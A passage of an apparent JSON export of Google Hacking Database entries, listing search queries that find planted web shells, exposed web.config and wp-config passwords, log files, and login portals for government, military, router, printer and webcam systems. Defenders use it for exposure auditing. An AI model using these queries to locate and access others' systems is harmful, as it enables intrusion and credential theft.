]\"", "textualDescription": "intitle:\"WSO \" ext:php intext:\"server ip\" 2015 intext:\" [ home ]\"\n\natawho-sonadam-hackunity" }, { "signatureReferenceNumber": "4173", "link": "https://www.exploit-db.com/ghdb/4173/", "category": "Footholds", "querystring": "http://www.google.com/search?q=ext:aspx intitle:aspxspy", "shortDescription": "ext:aspx intitle:aspxspy", "textualDescription": "Asp shells\n\next:aspx intitle:aspxspy\n\n\ndetails:\nhttp://atawho.blogspot.com.tr/2015/11/aspx-shell-dorku-ghbd.html\n\nsonadam-atawho-hackunity" }, { "signatureReferenceNumber": "4174", "link": "https://www.exploit-db.com/ghdb/4174/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intext:\"Sw Bilgi\" ext:php", "shortDescription": "intext:\"Sw Bilgi\" ext:php", "textualDescription": "Upload Shell Dork\n\nintext:\"Sw Bilgi\" ext:php\n\n details:\nhttp://atawho.blogspot.com.tr/2015/11/shell-dork-031115.html\natawho-sonadam-hackunity" }, { "signatureReferenceNumber": "4175", "link": "https://www.exploit-db.com/ghdb/4175/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intext:Developed By Black.Hack3r ext:php", "shortDescription": "intext:Developed By Black.Hack3r ext:php", "textualDescription": "Upload Shell Dorks\n\nintext:Developed By Black.Hack3r ext:php\n\nintitle:.:: Private Uploder By Black.Hack3r ::. ext:php\n\ndetail:" }, { "signatureReferenceNumber": "4176", "link": "https://www.exploit-db.com/ghdb/4176/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/tmui/login.jsp", "shortDescription": "inurl:/tmui/login.jsp", "textualDescription": "Administrative Panel Web F5 BIG-IP appliances\n\ninurl:/tmui/login.jsp\n\n@firebitsbr" }, { "signatureReferenceNumber": "4177", "link": "https://www.exploit-db.com/ghdb/4177/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle: Index of /awstats/data", "shortDescription": "intitle: Index of /awstats/data", "textualDescription": "Awstats Log file's directory can reveal file/directory location\nThese logs file may also reveal hosting account usernames,\nas awstats keep track of all files and folders traffic stats you can also\nget a chance to see some secret.txt or secret.php~\n\n\n\nRegards\nDevender Mahto\n@devendermahto" }, { "signatureReferenceNumber": "4178", "link": "https://www.exploit-db.com/ghdb/4178/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=\"Password=\" inurl:web.config -intext:web.config ext:config", "shortDescription": "\"Password=\" inurl:web.config -intext:web.config ext:config", "textualDescription": "This Dork show Passwords of web.config files.\nEnjoy them!.\nDork by Rootkit Pentester." }, { "signatureReferenceNumber": "4179", "link": "https://www.exploit-db.com/ghdb/4179/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:/SAML2/SOAP/ | inurl:/SAML2/POST", "shortDescription": "inurl:/SAML2/SOAP/ | inurl:/SAML2/POST", "textualDescription": "Shibboleth Error XML\n\n-Xploit" }, { "signatureReferenceNumber": "4180", "link": "https://www.exploit-db.com/ghdb/4180/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:intranet -intext:intranet", "shortDescription": "inurl:intranet -intext:intranet", "textualDescription": "This Dork show millions of access to intranet pages.\nDork by Rootkit Pentester.\nRegards." }, { "signatureReferenceNumber": "4181", "link": "https://www.exploit-db.com/ghdb/4181/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"", "shortDescription": "inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"", "textualDescription": "I give this Dork for Wordpress Passwords. I hope you enjoy with this!.\nDork: inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"\nBest Regards Rookit Pentester." }, { "signatureReferenceNumber": "4182", "link": "https://www.exploit-db.com/ghdb/4182/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle:\"Shell I\" inurl:revslider inurl:error.php inurl:cmd", "shortDescription": "intitle:\"Shell I\" inurl:revslider inurl:error.php inurl:cmd", "textualDescription": "Find shells inserted using the revslider vulnerability.\n\n--\nStephen Haywood\nOwner: ASG Consulting\naveragesecurityguy.info" }, { "signatureReferenceNumber": "4183", "link": "https://www.exploit-db.com/ghdb/4183/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl:revslider inurl:temp inurl:update_extract inurl:sym1", "shortDescription": "inurl:revslider inurl:temp inurl:update_extract inurl:sym1", "textualDescription": "Symlinks to files using the revslider vulnerability.\n\n--\nStephen Haywood\nOwner: ASG Consulting\naveragesecurityguy.info" }, { "signatureReferenceNumber": "4184", "link": "https://www.exploit-db.com/ghdb/4184/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/welcome.cgi? | p=no-cert", "shortDescription": "inurl:/welcome.cgi? | p=no-cert", "textualDescription": "Another Dork with Remote Logins\u00a0\n-Xploit" }, { "signatureReferenceNumber": "4185", "link": "https://www.exploit-db.com/ghdb/4185/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:autodiscover/autodiscover ext:xml", "shortDescription": "inurl:autodiscover/autodiscover ext:xml", "textualDescription": "Locate Outlook Web Apps that have auto-discover feature enabled\n\n-Oni49" }, { "signatureReferenceNumber": "4186", "link": "https://www.exploit-db.com/ghdb/4186/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:\"Microsoft(R) Server Maintenance Utility (Unicode)\" ext:txt", "shortDescription": "intext:\"Microsoft(R) Server Maintenance Utility (Unicode)\" ext:txt", "textualDescription": "Details:\nSearch result shows Txt files. Text files contains database information+server path disclosure+different db queries.\u00a0\n(\u00af`\u00b7._.\u00b7[ Silent_Z3R0 ]\u00b7._.\u00b7\u00b4\u00af)(\u00af`\u00b7._.\u00b7[ Pak Cyber Army ]\u00b7._.\u00b7\u00b4\u00af)" }, { "signatureReferenceNumber": "4187", "link": "https://www.exploit-db.com/ghdb/4187/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/oam/server/obrareq.cgi | ext:\"encquery\" | ext:\"Portal_Webcenter\"", "shortDescription": "inurl:/oam/server/obrareq.cgi | ext:\"encquery\" | ext:\"Portal_Webcenter\"", "textualDescription": "Login's for Oracle Access Management\n\n\n-Xploit" }, { "signatureReferenceNumber": "4188", "link": "https://www.exploit-db.com/ghdb/4188/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:phpPgAdmin/browser.php intitle:\"phpPgAdmin\"", "shortDescription": "inurl:phpPgAdmin/browser.php intitle:\"phpPgAdmin\"", "textualDescription": "Dork For phpPgAdmin servers portal.\nDiscovered for Rootkit Pentester.\nRegards." }, { "signatureReferenceNumber": "4189", "link": "https://www.exploit-db.com/ghdb/4189/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=site:www.comune.*.*.* inurl:login", "shortDescription": "site:www.comune.*.*.* inurl:login", "textualDescription": "# Exploit Title: Dork to find Comune Websites.\n# Google Dork: site:www.comune.*.*.* inurl:login\n# Description : Finds out login portals to Comune Websites.\n# Date: 27/01/2016\n# Author: XDarkCoder" }, { "signatureReferenceNumber": "4190", "link": "https://www.exploit-db.com/ghdb/4190/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/AirWatch/Login?", "shortDescription": "inurl:/AirWatch/Login?", "textualDescription": "AirWatch Company.\nLogin/Trouble Logging In/ Back to Login Page / Don't remember your Username Login \"Errors\"\n\n\n-Xploit" }, { "signatureReferenceNumber": "4191", "link": "https://www.exploit-db.com/ghdb/4191/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:haproxy-status site:example.com", "shortDescription": "inurl:haproxy-status site:example.com", "textualDescription": "Dork to find system info leaks using haproxy stats.\n\n- ivxenog" }, { "signatureReferenceNumber": "4192", "link": "https://www.exploit-db.com/ghdb/4192/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:\"TurnKey LAMP\" intext:\"turnkey lamp release notes\" \"Apache PHP information\"", "shortDescription": "intitle:\"TurnKey LAMP\" intext:\"turnkey lamp release notes\" \"Apache PHP information\"", "textualDescription": "Detail:\n\u00a0 \u00a0 Google results shows turnkey lamp default page which discloses information server like PHPINFO page, Apache server Status, webmin login page and many more.\n\n[ Silent Z3R0 ]-[Pakistan Cyber Army]" }, { "signatureReferenceNumber": "4193", "link": "https://www.exploit-db.com/ghdb/4193/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=site:www.tribunale.*.*.* inurl:login", "shortDescription": "site:www.tribunale.*.*.* inurl:login", "textualDescription": "# Exploit Title: Dork to find Tribunale Websites.\n# Google Dork: site:www.tribunale.*.*.* inurl:login\n# Description : Finds out login portals on Tribunale Websites. Gov related\n# Date: 07/02/2016\n# Exploit Author: XDarkCoder" }, { "signatureReferenceNumber": "4194", "link": "https://www.exploit-db.com/ghdb/4194/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:/nesp/app", "shortDescription": "inurl:/nesp/app", "textualDescription": "Novell Access Manager and NetIQ Access Manager\u00a0\nError:NIDPMAIN\u00a0(No ESP card defined)\n\n-Xploit" }, { "signatureReferenceNumber": "4195", "link": "https://www.exploit-db.com/ghdb/4195/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Welcome | PRTG Network Monitor\" inurl:/index.htm", "shortDescription": "intitle:\"Welcome | PRTG Network Monitor\" inurl:/index.htm", "textualDescription": "Login screen for network monitoring system.\n\nAuthor: Manuel Mancera (@sinkmanu)" }, { "signatureReferenceNumber": "4196", "link": "https://www.exploit-db.com/ghdb/4196/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=\"Web page sent by InterMapper\"", "shortDescription": "\"Web page sent by InterMapper\"", "textualDescription": "Dork with funny maps of networks.\nDork by Rootkit Pentester.\nRegards." }, { "signatureReferenceNumber": "4197", "link": "https://www.exploit-db.com/ghdb/4197/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:login.do intext:government", "shortDescription": "inurl:login.do intext:government", "textualDescription": "# Exploit Title: Dork to find Government and Military website access\nportals.\n# Google Dork: inurl:login.do intext:government\n# Description : Finds out login access portals to Military and Government\nSystems. Enjoy.\n# Date: 09/02/2016\n# Exploit Author: XDarkCoder" }, { "signatureReferenceNumber": "4198", "link": "https://www.exploit-db.com/ghdb/4198/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:intranet site:www.*.gov", "shortDescription": "inurl:intranet site:www.*.gov", "textualDescription": "# Exploit Title: inurl:intranet site:www.*.gov\n# Google Dork: inurl:intranet site:www.*.gov\n# Description : Dork to find login portal access to intranet systems\non government websites.\n# Date: 09/02/2016\n# Exploit Author: XDarkCoder" }, { "signatureReferenceNumber": "4199", "link": "https://www.exploit-db.com/ghdb/4199/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"homematic webui\"", "shortDescription": "intitle:\"homematic webui\"", "textualDescription": "Description: WebUI for Homematic Home-Control-System\n\nGoogle search : intitle:\"homematic webui\"\n\nAuthor : BasisX & DonJoe" }, { "signatureReferenceNumber": "4200", "link": "https://www.exploit-db.com/ghdb/4200/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:webcam 7 inurl:8080 -intext:8080", "shortDescription": "intitle:webcam 7 inurl:8080 -intext:8080", "textualDescription": "Dork with webcams servers.\nEnjoy with the view.\nDork by Rootkit Pentester.\nRegards." }, { "signatureReferenceNumber": "4201", "link": "https://www.exploit-db.com/ghdb/4201/", "category": "Footholds", "querystring": "http://www.google.com/search?q=(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\"", "shortDescription": "(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\"", "textualDescription": "(intitle:\"phpshell\" OR intitle:\"c99shell\" OR intitle:\"r57shell\" OR intitle:\"PHP Shell \" OR intitle:\"phpRemoteView\") `rwx` \"uname\"" }, { "signatureReferenceNumber": "4202", "link": "https://www.exploit-db.com/ghdb/4202/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle: \"phpshell\" \"Php Safe-Mode Bypass\"", "shortDescription": "intitle: \"phpshell\" \"Php Safe-Mode Bypass\"", "textualDescription": "intitle: \"phpshell\" \"Php Safe-Mode Bypass\"" }, { "signatureReferenceNumber": "4203", "link": "https://www.exploit-db.com/ghdb/4203/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:\"Index of /\"", "shortDescription": "intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:\"Index of /\"", "textualDescription": "Server Name and Port.\n-Xploit" }, { "signatureReferenceNumber": "4204", "link": "https://www.exploit-db.com/ghdb/4204/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin", "shortDescription": "inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin", "textualDescription": "inurl:/AT-admin.cgi? intitle:login | private | employee | intranet | admin\n\n\nPages containing login portals\n\n\nBruno Schmid\nhttps://ch.linkedin.com/in/schmidbruno" }, { "signatureReferenceNumber": "4205", "link": "https://www.exploit-db.com/ghdb/4205/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:login inurl:user inurl:pass -intext:pass -intext:user", "shortDescription": "inurl:login inurl:user inurl:pass -intext:pass -intext:user", "textualDescription": "With this Dork you can Bypass the security of a lot of Cpanel Portal.\nHave Fun.\nDork discovered by Rootkit Pentester." }, { "signatureReferenceNumber": "4206", "link": "https://www.exploit-db.com/ghdb/4206/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:\"Apache Status\" | intext:\"Apache Server Status\"", "shortDescription": "intitle:\"Apache Status\" | intext:\"Apache Server Status\"", "textualDescription": "This dork gives,\nApache Server Status\nServer Version:\u00a0\nServer Built:\u00a0\nCurrent Time:\u00a0\nRestart Time:\u00a0\nParent Server Generation:\u00a0\nServer uptime:\u00a0\n\n-Xploit" }, { "signatureReferenceNumber": "4207", "link": "https://www.exploit-db.com/ghdb/4207/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:safm.asp ext:asp", "shortDescription": "inurl:safm.asp ext:asp", "textualDescription": "inurl:safm.asp ext:asp\n\nhttp://atawho.blogspot.com.tr/2016/03/simple-asp-filemanager.html\n\natawho-sonadam" }, { "signatureReferenceNumber": "4208", "link": "https://www.exploit-db.com/ghdb/4208/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Helm : The Web Hosting Control System\"", "shortDescription": "intitle:\"Helm : The Web Hosting Control System\"", "textualDescription": "Description: Helm Control Panel login page\nGoogle search: intitle:\"Helm : The Web Hosting Control System\"\nAutor: nebo_oben" }, { "signatureReferenceNumber": "4209", "link": "https://www.exploit-db.com/ghdb/4209/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"FirstSpirit - login\"", "shortDescription": "intitle:\"FirstSpirit - login\"", "textualDescription": "Description: FirstSpirit Content Management System login page\nGoogle search: intitle:\"FirstSpirit - login\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4210", "link": "https://www.exploit-db.com/ghdb/4210/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"D-Link VoIP Router\" \"Welcome\"", "shortDescription": "intitle:\"D-Link VoIP Router\" \"Welcome\"", "textualDescription": "Description: D-Link VoIP Router login page\nGoogle search: intitle:\"D-Link VoIP Router\" \"Welcome\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4211", "link": "https://www.exploit-db.com/ghdb/4211/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"ASUS Login\" \"SIGN IN\"", "shortDescription": "intitle:\"ASUS Login\" \"SIGN IN\"", "textualDescription": "Description: ASUS router login page\nGoogle search: intitle:\"ASUS Login\" \"SIGN IN\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4212", "link": "https://www.exploit-db.com/ghdb/4212/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"8000\" inurl:\"login\"", "shortDescription": "inurl:\"8000\" inurl:\"login\"", "textualDescription": "Login forms. Mostly ftp.\n\nGoogle dork:\ninurl:\"8000\" inurl:\"login\"\n\nD0bby" }, { "signatureReferenceNumber": "4213", "link": "https://www.exploit-db.com/ghdb/4213/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm", "shortDescription": "inurl:/console-selfservice/common/scripts/calendar/ipopeng.htm", "textualDescription": "RSA Self-Service Console \"Error\"\n\n-Xploit" }, { "signatureReferenceNumber": "4214", "link": "https://www.exploit-db.com/ghdb/4214/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"sugarcrm.log\" ext:log -git -google", "shortDescription": "inurl:\"sugarcrm.log\" ext:log -git -google", "textualDescription": "Description: SugarCRM log files\nGoogle search: inurl:\"sugarcrm.log\" ext:log -git -google\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4215", "link": "https://www.exploit-db.com/ghdb/4215/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"DirectAdmin Login\" \"Please enter your Username and Password\"", "shortDescription": "intitle:\"DirectAdmin Login\" \"Please enter your Username and Password\"", "textualDescription": "Description: DirectAdmin Web Control Panel login page\nGoogle search: intitle:\"DirectAdmin Login\" \"Please enter your Username\nand Password\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4216", "link": "https://www.exploit-db.com/ghdb/4216/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web Image Monitor\"", "shortDescription": "inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web Image Monitor\"", "textualDescription": "Description: Web Image Monitor allows users to remotely monitor and\nchange the network configuration of Ricoh copiers, multifunctions and\nprinters via common web browsers\nGoogle search: inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web\nImage Monitor\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4217", "link": "https://www.exploit-db.com/ghdb/4217/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"info_deviceStatus.html\" | inurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" | inurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" | inurl:\"info_colorUsageJobLog.html\" | inurl:\"info_event", "shortDescription": "inurl:\"info_deviceStatus.html\" | inurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" | inurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" | inurl:\"info_colorUsageJobLog.html\" | inurl:\"info_eventLog.html\"", "textualDescription": "Description: HP LaserJet printer web panel\nGoogle search: inurl:\"info_deviceStatus.html\" |\ninurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" |\ninurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" |\ninurl:\"info_colorUsageJobLog.html\" | inurl:\"info_eventLog.html\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4218", "link": "https://www.exploit-db.com/ghdb/4218/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"SyncThru Web Service\" inurl:\"sws\"", "shortDescription": "intitle:\"SyncThru Web Service\" inurl:\"sws\"", "textualDescription": "Description: Samsung printer web panel\nGoogle search: intitle:\"SyncThru Web Service\" inurl:\"sws\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4219", "link": "https://www.exploit-db.com/ghdb/4219/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\" | inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" | inurl:\"index.htm?cat=bluetooth\"", "shortDescription": "inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\" | inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" | inurl:\"index.htm?cat=bluetooth\"", "textualDescription": "Description: HP OfficeJet printer web panel\nGoogle search: inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\"\n| inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" |\ninurl:\"index.htm?cat=bluetooth\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4220", "link": "https://www.exploit-db.com/ghdb/4220/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"", "shortDescription": "inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"", "textualDescription": "Description: Dell Laser printer web panel\nGoogle search: inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4221", "link": "https://www.exploit-db.com/ghdb/4221/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"login.php?action=recover\"", "shortDescription": "inurl:\"login.php?action=recover\"", "textualDescription": "Description: Password recovery forms\nGoogle search: inurl:\"login.php?action=recover\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4222", "link": "https://www.exploit-db.com/ghdb/4222/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:\"END_FILE\" ext:log", "shortDescription": "intext:\"END_FILE\" ext:log", "textualDescription": "Description: Files containing passwords\nGoogle search: intext:\"END_FILE\" ext:log\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4223", "link": "https://www.exploit-db.com/ghdb/4223/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"/,DanaInfo=\"", "shortDescription": "inurl:\"/,DanaInfo=\"", "textualDescription": "Yet another Remote Login Dork.\n-Xploit" }, { "signatureReferenceNumber": "4224", "link": "https://www.exploit-db.com/ghdb/4224/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=inurl:phpsysinfo/index.php?disp=dynamic", "shortDescription": "inurl:phpsysinfo/index.php?disp=dynamic", "textualDescription": "These Dork show a lot of info about servers behind the webpages.\nEnjoy healthy.\nBest Regard.\nRootkit Pentester." }, { "signatureReferenceNumber": "4225", "link": "https://www.exploit-db.com/ghdb/4225/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"sap-system-login\"", "shortDescription": "inurl:\"sap-system-login\"", "textualDescription": "Description: SAP Web Application Server login page\nGoogle search: inurl:\"sap-system-login\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4226", "link": "https://www.exploit-db.com/ghdb/4226/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:\"sap/hrrcf_a_startpage_ext_cand\" | inurl:\"sap/hrrcf_a_pw_via_email_extern\"", "shortDescription": "inurl:\"sap/hrrcf_a_startpage_ext_cand\" | inurl:\"sap/hrrcf_a_pw_via_email_extern\"", "textualDescription": "Description: SAP Web Application Server login page\nGoogle search: inurl:\"sap/hrrcf_a_startpage_ext_cand\" |\ninurl:\"sap/hrrcf_a_pw_via_email_extern\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4227", "link": "https://www.exploit-db.com/ghdb/4227/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Logon - SAP Web Application Server\"", "shortDescription": "intitle:\"Logon - SAP Web Application Server\"", "textualDescription": "Description: SAP Web Application Server login page\nGoogle search: intitle:\"Logon - SAP Web Application Server\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4228", "link": "https://www.exploit-db.com/ghdb/4228/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"", "shortDescription": "intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"", "textualDescription": "Description: SAP Web Application Server login page\nGoogle search: intext:\"2016 SAP AG. All rights reserved.\" intitle:\"Logon\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4229", "link": "https://www.exploit-db.com/ghdb/4229/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:\"Powered by net2ftp\"", "shortDescription": "intext:\"Powered by net2ftp\"", "textualDescription": "Description: Web based FTP client login page\nGoogle search: intext:\"Powered by net2ftp\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4230", "link": "https://www.exploit-db.com/ghdb/4230/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Login\" intext:\"Use Web Messaging Lite\"", "shortDescription": "intitle:\"Login\" intext:\"Use Web Messaging Lite\"", "textualDescription": "Description: Webmail login page\nGoogle search: intitle:\"Login\" intext:\"Use Web Messaging Lite\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4231", "link": "https://www.exploit-db.com/ghdb/4231/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"", "shortDescription": "intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"", "textualDescription": "Description: OpenERP login page\nGoogle search: intext:\"2008\" intext:\"OpenERP SA\" intitle:\"Login\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4232", "link": "https://www.exploit-db.com/ghdb/4232/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"mikrotik routeros > administration\" intext:\"mikrotik routeros\" intext:\"configuration page\" -demo intext:\"Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA\"", "shortDescription": "intitle:\"mikrotik routeros > administration\" intext:\"mikrotik routeros\" intext:\"configuration page\" -demo intext:\"Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA\"", "textualDescription": "Description: MikroTik RouterOS configuration & login page\nGoogle search: intitle:\"mikrotik routeros > administration\"\nintext:\"mikrotik routeros\" intext:\"configuration page\" -demo\nintext:\"Mikrotik, RouterOS and the Mikrotik logo are registered\ntrademarks of Mikrotikls SIA\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4233", "link": "https://www.exploit-db.com/ghdb/4233/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"RouterOS\" intitle:\"configuration page\" intext:\"You have connected to a router. Administrative access only.\"", "shortDescription": "intitle:\"RouterOS\" intitle:\"configuration page\" intext:\"You have connected to a router. Administrative access only.\"", "textualDescription": "Description: RouterOS configuration & login page\nGoogle search: intitle:\"RouterOS\" intitle:\"configuration page\"\nintext:\"You have connected to a router. Administrative access only.\"\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4234", "link": "https://www.exploit-db.com/ghdb/4234/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"TRENDnet\" (inurl:\"top.htm\"| inurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" | inurl:\"JVIEW.HTM\")", "shortDescription": "intitle:\"TRENDnet\" (inurl:\"top.htm\"| inurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" | inurl:\"JVIEW.HTM\")", "textualDescription": "Description: TRENDnet IP camera\nGoogle search: intitle:\"TRENDnet\" (inurl:\"top.htm\"|\ninurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" |\ninurl:\"JVIEW.HTM\")\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4235", "link": "https://www.exploit-db.com/ghdb/4235/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Honeywell XL Web Controller - Login\" (inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" | inurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" | inurl:\"standard/update.php\")", "shortDescription": "intitle:\"Honeywell XL Web Controller - Login\" (inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" | inurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" | inurl:\"standard/update.php\")", "textualDescription": "Description: Honeywell XL Web Controller login page\nGoogle search: intitle:\"Honeywell XL Web Controller - Login\"\n(inurl:\"standard/default.php\" | inurl:\"standard/header/header.php\" |\ninurl:\"standard/mainframe.php\" | inurl:\"standard/footer/footer.php\" |\ninurl:\"standard/update.php\")\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4236", "link": "https://www.exploit-db.com/ghdb/4236/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"Openbravo\" (inurl:\"openbravo/security/Login_FS.html\" | inurl:\"openbravo/security/Login_Welcome.html\" | inurl:\"openbravo/security/Login_F1.html\" | inurl:\"openbravo/security/Login_F0.html\")", "shortDescription": "intitle:\"Openbravo\" (inurl:\"openbravo/security/Login_FS.html\" | inurl:\"openbravo/security/Login_Welcome.html\" | inurl:\"openbravo/security/Login_F1.html\" | inurl:\"openbravo/security/Login_F0.html\")", "textualDescription": "Description: Openbravo login page\nGoogle search: intitle:\"Openbravo\"\n(inurl:\"openbravo/security/Login_FS.html\" |\ninurl:\"openbravo/security/Login_Welcome.html\" |\ninurl:\"openbravo/security/Login_F1.html\" |\ninurl:\"openbravo/security/Login_F0.html\")\nAuthor: nebo_oben" }, { "signatureReferenceNumber": "4237", "link": "https://www.exploit-db.com/ghdb/4237/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:Tenda ADSL2/2+ Modem inurl:main.html", "shortDescription": "intitle:Tenda ADSL2/2+ Modem inurl:main.html", "textualDescription": "Description: Tenda ADSL2/2+ Modem with Wireless Router\nGoogle search: intitle:Tenda ADSL2/2+ Modem 